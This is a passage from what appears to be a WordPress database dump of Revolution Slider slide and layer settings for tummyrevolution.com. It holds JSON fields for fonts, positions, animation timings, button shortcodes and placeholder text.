peed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"},\"11\":{\"text\":\"[qodef_button size=\\\"medium\\\" text=\\\"view more\\\" target=\\\"_self\\\" icon_pack=\\\"\\\" font_weight=\\\"\\\" text_transform=\\\"\\\"]\",\"alias\":\"[qodef_button text=\",\"uid\":11,\"size\":{\"width\":{\"d\":{\"v\":\"560px\",\"e\":true},\"n\":{\"v\":\"560px\",\"e\":true},\"t\":{\"v\":\"560px\"},\"m\":{\"v\":\"560px\"}},\"height\":{\"d\":{\"v\":\"55px\",\"e\":true},\"n\":{\"v\":\"55px\",\"e\":true},\"t\":{\"v\":\"55px\"},\"m\":{\"v\":\"55px\"}},\"originalWidth\":\"560px\",\"originalHeight\":\"55px\"},\"position\":{\"x\":{\"d\":{\"v\":\"562px\",\"e\":true},\"n\":{\"v\":\"434px\",\"e\":true},\"t\":{\"v\":\"151px\",\"e\":true},\"m\":{\"v\":\"47px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"634px\",\"e\":true},\"n\":{\"v\":\"408px\",\"e\":true},\"t\":{\"v\":\"511px\",\"e\":true},\"m\":{\"v\":\"338px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"zIndex\":14,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":14,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#000000\",\"e\":true},\"n\":{\"v\":\"#000000\",\"e\":true},\"t\":{\"v\":\"#000000\"},\"m\":{\"v\":\"#000000\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\"},\"m\":{\"v\":\"normal\"}},\"svg\":{\"color\":{\"d\":{\"v\":\"#000000\",\"e\":true},\"n\":{\"v\":\"#000000\",\"e\":true},\"t\":{\"v\":\"#000000\"},\"m\":{\"v\":\"#000000\"}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"}}','{\"0\":\"\",\"version\":\"6.6.0\"}'),(12,6,1,'{\"title\":\"Slide\",\"bg\":{\"type\":\"image\",\"color\":\"#E7E7E7\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h5-slider-graphic-1.jpg\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"info\":{\"params\":[{\"v\":\"03\"},{\"v\":\"02\"}]},\"timeline\":{\"slots\":[\"default\"],\"duration\":[600]},\"effects\":{\"parallax\":\"9\"},\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','{\"1\":{\"text\":\"Head Start!\",\"alias\":\"Quick Start\",\"uid\":1,\"size\":{\"width\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"344px\",\"e\":true},\"n\":{\"v\":\"180px\",\"e\":true},\"t\":{\"v\":\"10px\",\"e\":true},\"m\":{\"v\":\"30px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"243px\",\"e\":true},\"n\":{\"v\":\"161px\",\"e\":true},\"t\":{\"v\":\"590px\",\"e\":true},\"m\":{\"v\":\"90px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":5,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":200},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":200,\"startRelative\":200},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":200,\"startRelative\":200},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"nothing\",\"start\":3000,\"startRelative\":1800,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#1e1e1e\",\"e\":true},\"n\":{\"v\":\"#1e1e1e\",\"e\":true},\"t\":{\"v\":\"#1e1e1e\",\"e\":true},\"m\":{\"v\":\"#1e1e1e\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"Quicksand\",\"fontSize\":{\"d\":{\"v\":\"72px\",\"e\":true},\"n\":{\"v\":\"72px\",\"e\":true},\"t\":{\"v\":\"65px\",\"e\":true},\"m\":{\"v\":\"55px\",\"e\":true}},\"fontWeight\":{\"d\":{\"v\":\"700\",\"e\":true},\"n\":{\"v\":\"700\",\"e\":true},\"t\":{\"v\":\"700\",\"e\":true},\"m\":{\"v\":\"700\",\"e\":true}},\"letterSpacing\":{\"d\":{\"v\":\"2px\",\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"72px\",\"e\":true},\"n\":{\"v\":\"72px\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#1e1e1e\",\"e\":true},\"n\":{\"v\":\"#1e1e1e\",\"e\":true},\"t\":{\"v\":\"#1e1e1e\",\"e\":true},\"m\":{\"v\":\"#1e1e1e\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"},\"2\":{\"text\":\"Luisque quis velit dictum, fringilla ex quis, ase tristique diam. Aliquam erat volutpat\\n.\",\"alias\":\"Quisque quis velit d...\",\"uid\":2,\"size\":{\"width\":{\"d\":{\"v\":\"421px\",\"e\":true},\"n\":{\"v\":\"382px\",\"e\":true},\"t\":{\"v\":\"369px\",\"e\":true},\"m\":{\"v\":\"301px\",\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"v\":\"51px\",\"e\":true},\"m\":{\"e\":true}},\"originalWidth\":\"421px\"},\"position\":{\"x\":{\"d\":{\"v\":\"344px\",\"e\":true},\"n\":{\"v\":\"180px\",\"e\":true},\"t\":{\"v\":\"10px\",\"e\":true},\"m\":{\"v\":\"30px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"338px\",\"e\":true},\"n\":{\"v\":\"254px\",\"e\":true},\"t\":{\"v\":\"655px\",\"e\":true},\"m\":{\"v\":\"145px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":6,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":500},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":500,\"startRelative\":500},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":500,\"startRelative\":500},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"nothing\",\"start\":3000,\"startRelative\":1500,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#7a7a7a\",\"e\":true},\"n\":{\"v\":\"#7a7a7a\",\"e\":true},\"t\":{\"v\":\"#7a7a7a\",\"e\":true},\"m\":{\"v\":\"#7a7a7a\",\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"v\":\"18px\",\"e\":true},\"m\":{\"v\":\"16px\",\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"30px\",\"e\":true},\"n\":{\"v\":\"30px\",\"e\":true},\"t\":{\"v\":\"22px\",\"e\":true},\"m\":{\"v\":\"20px\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\",\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"#7a7a7a\",\"e\":true},\"n\":{\"v\":\"#7a7a7a\",\"e\":true},\"t\":{\"v\":\"#7a7a7a\",\"e\":true},\"m\":{\"v\":\"#7a7a7a\",\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"},\"3\":{\"text\":\"[qodef_button text=\\\"view more\\\" target=\\\"_self\\\" icon_pack=\\\"\\\" font_weight=\\\"\\\" text_transform=\\\"\\\"]\",\"alias\":\"[qodef_button text=\",\"uid\":3,\"size\":{\"width\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}},\"position\":{\"x\":{\"d\":{\"v\":\"345px\",\"e\":true},\"n\":{\"v\":\"181px\",\"e\":true},\"t\":{\"v\":\"10px\",\"e\":true},\"m\":{\"v\":\"30px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"422px\",\"e\":true},\"n\":{\"v\":\"337px\",\"e\":true},\"t\":{\"v\":\"725px\",\"e\":true},\"m\":{\"v\":\"215px\",\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":7,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":7,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":800},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":800,\"startRelative\":800},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":800,\"startRelative\":800},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"nothing\",\"start\":3000,\"startRelative\":1200,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"text\",\"version\":\"6.6.0\"}}','{\"0\":\"\",\"version\":\"6.6.0\"}'),(13,6,2,'{\"title\":\"Slide\",\"bg\":{\"type\":\"image\",\"color\":\"#E7E7E7\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h5-slider-graphic-3.jpg\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"info\":{\"params\":[{\"v\":\"03\"},{\"v\":\"02\"}]},\"timeline\":{\"slots\":[\"default\"],\"duration\":[600]},\"effects\":{\"parallax\":\"9\"},\"version\":\"6.6.0\",\"slideChange\":{\"adpr\":false}}','{\"1\":{\"text\":\"Rise and run!\",\"alias\":\"Quick 